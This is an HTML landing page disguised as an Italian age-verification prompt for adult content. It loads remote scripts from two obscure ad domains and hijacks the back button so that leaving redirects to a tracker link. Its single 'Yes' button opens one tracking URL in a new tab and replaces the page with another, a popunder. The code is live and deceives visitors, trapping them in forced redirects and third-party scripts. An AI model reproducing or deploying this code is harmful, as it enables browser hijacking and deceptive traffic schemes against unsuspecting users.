<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>18+</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
      }
      #background-container {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        z-index: -1;
      }
      #background-image {
        background-image: url("9926_screen.jpg"); /* Replace '9926_screen.jpg' with the path to your background image */
        background-size: cover;
        background-position: center;
        opacity: 0.3; /* Adjust the opacity value as needed */
        width: 100%;
        height: 100%;
      }
      #container {
        text-align: center;
      }
      h1 {
        color: black;
        font-size: 3rem;
      }
      a.button {
        display: inline-block;
        font-size: 20px;
        padding: 15px 30px;
        background-color: rgb(39, 255, 39);
        color: white;
        border: none;
        border-radius: 5px;
        text-decoration: none; /* Remove default underline for anchor elements */
        cursor: pointer;
        transition: background-color 0.3s ease;
      }
      a.button:hover {
        color: red;
      }
    </style>
    <script type="text/javascript">
      const time_wait = 0;
      const blackout = 0;
      const yaban = 0;
      const title = "";
      const desc = "";
    </script>
    <script
      type="text/javascript"
      src="https://news-zacine.com/code/https-v2.js?uid=179211&site=1222192963&banadu=0&sub1=sub1&sub2=sub2&sub3=sub3&sub4=sub4"
      async
    ></script>
    <script
      type="text/javascript"
      src="https://news-derile.cc/process.js?id=1222192963&p1=sub1&p2=sub2&p3=sub3&p4=sub4"
      async
    ></script>

    <script>
      window.onload = function () {
        if (window.history && window.history.pushState) {
          history.pushState(null, null, document.URL);
          window.addEventListener("popstate", function () {
            history.pushState(null, null, document.URL);
            // Здесь добавьте код для перенаправления пользователя на нужную вам ссылку
            window.location.href =
              "http://trk-1.online/go/06a977a1-2b64-4e77-b0bd-67d66016dca7?cpc={cpc}&ref_id={click_id}&campaign_id={campaign_id}&sub_id={sub_id}&creative_id={creative_id}&source_id={source_id}";
          });
        }
      };
    </script>
    <script>
      document.addEventListener("DOMContentLoaded", function () {
        document
          .querySelector(".button")
          .addEventListener("click", function (e) {
            // prevent default button click
            e.preventDefault();

            // "main offer" (new tab takes focus)
            window.open("https://trk-1.online/click", "_blank", "noreferrer");

            // "popunder" (current tab)
            window.location.replace(
              "http://trk-1.online/go/7ff5e2ab-e3d8-4244-9035-657eba47b228?cpc={cpc}&ref_id={click_id}&campaign_id={campaign_id}&sub_id={sub_id}&creative_id={creative_id}&source_id={source_id}"
            );
          });
      });
    </script>
  </head>
  <body>
    <div id="background-container">
      <div id="background-image"></div>
    </div>
    <div id="container">
      <h1>Hai 18 anni o più?</h1>
      <a class="button">Sì</a>
    </div>
  </body>
</html>
